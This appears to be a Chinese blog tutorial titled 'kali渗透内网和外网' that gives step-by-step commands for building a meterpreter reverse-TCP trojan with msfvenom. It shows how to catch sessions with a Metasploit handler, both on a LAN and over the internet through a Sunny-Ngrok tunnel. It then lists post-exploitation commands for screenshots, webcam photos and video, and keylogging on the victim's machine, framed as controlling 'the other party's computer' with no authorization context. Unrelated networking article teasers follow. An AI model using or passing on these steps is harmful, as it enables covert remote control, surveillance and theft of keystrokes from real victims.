kali渗透内网和外网
生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵)
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:
-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”
lhost:设置kali的IP
lport:设置端口(要与下面的setlport保持一致)
-f:文件的类型为exe类型
-o:生成payload,名为payload.exe,保存在kali的/root目录下
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/tjy.exe
第二步:将生成的木马文件发送到对方电脑
我们启动kali
msfconsole 进入msfconsole
use exploit/multi/handler 使用这个漏洞辅助
设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)
set payload windows/meterpreter/reverse_tcp
设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致
exploit 或 run
接下来我们只要等对方电脑运行刚刚那个木马
生成木马文件,从而控制对方电脑(内网可以入侵外网)
在开始生成木马之前,我们要先做好准备工作
在kali里面要下载Sunny-Ngrok的Linux64版本,下载好后解压
接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用
这里将下载好的linux64压缩包进行解压
命令解压缩:unzip linux_amd64(压缩包名)
进入解压好的目录
cd linux_amd64
启动隧道映射TCP服务
./sunny clientid (隧道id) 这里的隧道id看下图
启动后是这样的
接下来就是生成外网的木马程序了
注意:这里lhost和lport分别为赠送的域名和端口
msfvenom -p windows/meterpreter/reverse_tcplhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe
接下来就是在msf中设置payload,加载攻击模块设置本地IP何监听端口了
msfconsole 打开msf
use exploit/multi/handler 使用这个漏洞辅助
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)
set LHOST 192.168.245.140 这里设置成kali的IP
set LPORT 4444 这里是你要侦听的端口
这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网
show options 查看IP端口设置情况
exploit 或 run 开启侦听
接下来我们只要等对方电脑运行刚刚那个木马
成功后时以下这图
入侵成功后所能做的(这只是可以做的一部分)
getuid 获取靶机uidmeterpreter
shell 进入靶机shellmeterpreter
screenshot 靶机截屏meterpreter
webcam_snap 用靶机摄像头拍照meterpreter
webcam_stream 用靶机摄像头录像meterpreter
keyscan_start 开启键盘记录meterpreter
keyscan_dump 捕获键盘记录
keyscan_stop 停止键盘记录
kali渗透内网和外网相关推荐
- 什么是外网?外网需要做等保吗?与内网的区别是什么?
什么是外网?外网需要做等保吗?与内网的区别是什么?还有很多小伙伴对于这三个问题不清楚,今天我们小编就给大家简单回答一下. 什么是外网? [回答]:外网就是广域网.广域网又称外网.公网,是连接不同地区局 ...
- uboot 如何设置网关地址_两种网络地址段,如何设置内网和外网一起上?
一般企业都会有自己内部专用业务网络.及对外的互联业务两个网络,在具体使用过程中,根据业务类型的不同.部门职能的不同而分开使用两种网络. 但在使用过程中总会有特殊情况,就是一台电脑要同时使用两种业务网络 ...
- 实习笔记0708 https协议/ django中间件/接口测试/内网与外网/域名系统DNS
1 https协议 https://www.cnblogs.com/superfeeling/p/11561340.html https://www.cnblogs.com/an-wen/p/1118 ...
- UDP内网和外网连接通信的问题
这几天忙着搞UDP的socket通信,忙乎了几天终于有点成就了,窃喜下.... 如果你不懂内网和外网的区别,不懂局域网和广域网就先熟悉下,再来看程序.我目前的情况是客户端在一个内网上,要连接外网的服务 ...
- 网络知识:内网、外网、宽带、带宽、流量、网速之间的联系?
相信很多人都不知道内网.外网.宽带.带宽.流量.网速之间的区别与联系,今天小编给大家介绍一下,希望对大家能有所帮助! 一.带宽与宽带的区别是什么? 带宽是量词,指的是网速的大小,比如1Mbps的意思是 ...
- iptables 状态策略 允许内网连接外网 拒绝外网主动连入内网 _ 笔记
4种状态 new established related invalid NEW ( a连接b 在b没有回复前 都被称为NEW包) ESTABLISHED ( a和b 连接成功 只有一个连接时 称为E ...
- 内网转外网方法 Sunny-Ngrok
有些时候需要将项目展示给别人看,但是项目只在本地运行,别人只能和你的电脑在同一个局域网中才可以看到:当你开发微信的时候,需要有一个域名,而买域名有需要备案,备案周期长,过程麻烦... 那怎么办呢... ...
- iptables学习笔记:端口转发之“内网访问外网”
我们一般使用路由上网,本机IP是内网私有IP,如192.168.1.100/24,而不是公网IP.至于能上网,是因为路由器已经做了转发.本文以实例介绍地址转换,实现内网设备与外部网络通信.有了前文的介 ...
- H3C SecPath U200-S 如何在内网使用外网IP地址访问内网服务器
H3C SecPath U200-S 如何在内网使用外网IP地址访问内网服务器 ------------------------------------------------------------ ...
最新文章
- Nio得知3——该示范基地:多路复用器模式
- 2021 年第十一届 MathorCup 高校数学建模挑战赛A题分析
- 关于一个js传值的错误
- 打印系列一:(套打解决方案(支持B/S和C/S))
- zabbix监控部署 与添加主机
- 0.IT-解决方案-0-VOIP
- matlab myupdatefcn,MATLAB笔记
- 如何复制百度文库、豆丁网上的文本
- 猫途鹰联手携程集团打造面向中国出境旅行者的顶级旅行平台
- Altium Designer 打印PCB板元件位置图
- MySQL-锁表和解锁
- 链家混三个月底薪_应届毕业生入职链家,到离职
- 科学计算机反导按键,backspace是哪个键?最实用按键的大 揭秘
- 利用空间分析进行学校选址
- JavaScript之“创意时钟”项目
- 成功安装python后、在dos命令行窗口中-python在WIN运行时去掉DOS窗口显示的方法
- tf.extract_image_patches
- 计算机网络专业运动会入场式,这所学校运动会开幕式亮了!各方阵带着专业C位亮相...
- MATLAB的MEX文件编写和调试
- windows之间(2台设备以上)同步工具syncthing使用教程